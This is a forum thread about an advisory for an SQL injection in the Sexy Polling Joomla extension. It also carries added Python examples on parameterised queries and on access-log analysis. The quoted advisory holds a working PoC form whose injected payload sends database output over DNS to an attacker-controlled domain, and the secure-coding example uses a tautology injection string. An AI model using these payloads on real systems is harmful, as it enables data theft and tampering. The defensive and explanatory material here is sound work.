SQL Injection


New postby srm » Mon Feb 02, 2015 8:10 pm

Hi, I have a huuuuge problem.

My hosting company have listed the following, and it is causing major issues on my server as the CPU is running far too high.

I was sent this:

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in Sexy Polling Joomla Extension, which can be exploited to perform SQL Injection attacks.

1) SQL Injection in Sexy Polling Joomla Extension: CVE-2013-7219
The vulnerability exists due to insufficient validation of the "answer_id[]" HTTP POST parameter passed to the "/components/com_sexypolling/vote.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database.
The following exploitation example is based on the DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding the IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker):
<form action="http://[host]/components/com_sexypolling/vote.php"
method="post" name="main">
<input type="hidden" name="answer_id[]" value="',(select load_file(CONCAT(CHAR(92),CHAR(92),(select
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))),'','','','','')
-- ">
<input type="submit" id="btn">
</form>

Please can I have assistance urgently.
srm
 
Posts: 5
Joined: Fri Jan 09, 2015 12:04 pm
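The advisory quoted above attributes the flaw to missing validation of the answer_id[] array before it reaches the database. The following Python example (added here for illustration; it is not the extension's code and does not reproduce its queries) contrasts the unsafe pattern, where each submitted value is spliced into the SQL text, with the hardened pattern, where values are allow-list validated as integers and bound as parameters. The table layout, sample rows and the sqlite3 backend are constructed for the example; the extension itself runs on MySQL under Joomla.

```python
import sqlite3


def make_poll_db():
    """Create a small in-memory poll database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE answers (id INTEGER PRIMARY KEY, poll_id INTEGER, votes INTEGER)"
    )
    conn.executemany(
        "INSERT INTO answers VALUES (?, ?, ?)",
        [(1, 10, 0), (2, 10, 0), (3, 11, 0)],
    )
    conn.commit()
    return conn


def record_votes_vulnerable(conn, answer_ids):
    """Unsafe pattern (hypothetical, for contrast only): each submitted
    answer_id[] value is spliced into the SQL text, so whatever the client
    sends becomes part of the statement. A tautology in one element turns a
    single-row update into an update of every row, i.e. vote tampering."""
    changed = 0
    for raw in answer_ids:
        sql = f"UPDATE answers SET votes = votes + 1 WHERE id = '{raw}'"
        changed += conn.execute(sql).rowcount
    conn.commit()
    return changed


def validate_answer_ids(raw_values, max_items=20):
    """Allow-list validation: every element must be a string of ASCII digits
    and the list must have a sane length. Anything else is rejected outright
    rather than 'cleaned', so no attacker-controlled text reaches the query."""
    if not isinstance(raw_values, (list, tuple)) or not raw_values:
        raise ValueError("answer_id[] must be a non-empty list")
    if len(raw_values) > max_items:
        raise ValueError("too many answer_id[] values")
    ids = []
    for raw in raw_values:
        if not isinstance(raw, str) or not raw.isascii() or not raw.isdigit():
            raise ValueError(f"rejected answer_id value: {raw!r}")
        ids.append(int(raw))
    return ids


def record_votes_hardened(conn, answer_ids):
    """Safe pattern: validated integers are bound as parameters, never
    concatenated, so the statement structure is fixed before data is supplied."""
    changed = 0
    for answer_id in validate_answer_ids(answer_ids):
        cur = conn.execute(
            "UPDATE answers SET votes = votes + 1 WHERE id = ?", (answer_id,)
        )
        changed += cur.rowcount
    conn.commit()
    return changed


if __name__ == "__main__":
    db = make_poll_db()
    print("legit vote, vulnerable path:", record_votes_vulnerable(db, ["2"]))
    print("tautology, vulnerable path:", record_votes_vulnerable(db, ["1' OR '1'='1"]))
    db = make_poll_db()
    print("legit votes, hardened path:", record_votes_hardened(db, ["1", "3"]))
    try:
        record_votes_hardened(db, ["1' OR '1'='1"])
    except ValueError as err:
        print("hardened path rejected input:", err)
```

The vulnerable path reports three modified rows for a single malformed element; the hardened path raises before any query runs. Rejecting rather than escaping is the point: once the values are known to be integers, parameter binding makes the query shape independent of the request, and the same rule (validate the array length and every element) also bounds the amount of database work one request can trigger.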

Re: SQL Injection

New postby Edvard » Tue Feb 03, 2015 4:13 pm

You are going in the wrong direction. Please check your access logs to understand what the problem is.

Thanks!
Regards,

Edvard Ananyan - 2GLux Team

Please post a review at the Joomla Extensions Directory. It is very important for us!
Edvard
Site Admin
 
Posts: 1836
Joined: Mon Jun 28, 2010 1:54 pm
Location: Yerevan, Armenia
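As a worked illustration of the advice above (an added example, not code from the 2GLux team or the extension), the script below summarises an Apache/nginx "combined" format access log per client IP for POST requests to the vote.php path named in the advisory, and flags sources whose hit count and request rate exceed thresholds. The log lines, IP addresses, user agents and thresholds are constructed for this example; the log format and the path are assumptions to adjust for a real server.

```python
import re
from collections import defaultdict
from datetime import datetime

# Path named in the advisory; adjust if the site is installed under a prefix.
VOTE_PATH = "/components/com_sexypolling/vote.php"

# Apache/nginx "combined" log format (assumed; adapt the regex for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Constructed sample: one scripted client hammering vote.php, one ordinary visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Feb/2015:20:01:10 +0000] "POST /components/com_sexypolling/vote.php HTTP/1.1" 200 512 "-" "python-requests/2.5.1"
203.0.113.7 - - [02/Feb/2015:20:01:11 +0000] "POST /components/com_sexypolling/vote.php HTTP/1.1" 200 512 "-" "python-requests/2.5.1"
198.51.100.4 - - [02/Feb/2015:20:01:12 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Feb/2015:20:01:12 +0000] "POST /components/com_sexypolling/vote.php HTTP/1.1" 200 512 "-" "python-requests/2.5.1"
203.0.113.7 - - [02/Feb/2015:20:01:13 +0000] "POST /components/com_sexypolling/vote.php HTTP/1.1" 500 0 "-" "python-requests/2.5.1"
203.0.113.7 - - [02/Feb/2015:20:01:14 +0000] "POST /components/com_sexypolling/vote.php HTTP/1.1" 200 512 "-" "python-requests/2.5.1"
198.51.100.4 - - [02/Feb/2015:20:02:30 +0000] "POST /components/com_sexypolling/vote.php HTTP/1.1" 303 0 "http://example.test/" "Mozilla/5.0"
203.0.113.7 - - [02/Feb/2015:20:01:15 +0000] "POST /components/com_sexypolling/vote.php HTTP/1.1" 200 512 "-" "python-requests/2.5.1"
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def summarise_vote_posts(lines):
    """Group POSTs to VOTE_PATH by client IP: hit count, time window, user
    agents seen, and non-2xx/3xx responses (bursts of errors often accompany
    automated probing of a parameter)."""
    per_ip = defaultdict(lambda: {"hits": 0, "first": None, "last": None,
                                  "user_agents": set(), "errors": 0})
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST":
            continue
        if rec["path"].split("?", 1)[0] != VOTE_PATH:
            continue
        entry = per_ip[rec["ip"]]
        entry["hits"] += 1
        entry["first"] = rec["ts"] if entry["first"] is None else min(entry["first"], rec["ts"])
        entry["last"] = rec["ts"] if entry["last"] is None else max(entry["last"], rec["ts"])
        entry["user_agents"].add(rec["ua"] or "-")
        if rec["status"][0] not in "23":
            entry["errors"] += 1
    return dict(per_ip)


def rate_per_minute(entry):
    """Requests per minute over the observed window (minimum window 1 s)."""
    span = max((entry["last"] - entry["first"]).total_seconds(), 1.0)
    return entry["hits"] * 60.0 / span


def flag_sources(summary, min_hits=5, min_rate=30.0):
    """IPs worth a closer look: enough hits AND a rate no human voter reaches."""
    return sorted(ip for ip, e in summary.items()
                  if e["hits"] >= min_hits and rate_per_minute(e) >= min_rate)


if __name__ == "__main__":
    summary = summarise_vote_posts(SAMPLE_LOG.splitlines())
    for ip, e in summary.items():
        print(f"{ip}: {e['hits']} POSTs, {e['errors']} errors, "
              f"{rate_per_minute(e):.0f}/min, UAs={sorted(e['user_agents'])}")
    print("flagged:", flag_sources(summary))
```

Run against a real log with something like `summarise_vote_posts(open("/var/log/apache2/access.log"))`. The output answers the question the reply raises: whether the CPU load comes from a handful of sources sending vote.php requests at machine speed, which is what a blocked IP, a rate limit, or an updated extension would address, rather than from the page's own traffic.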

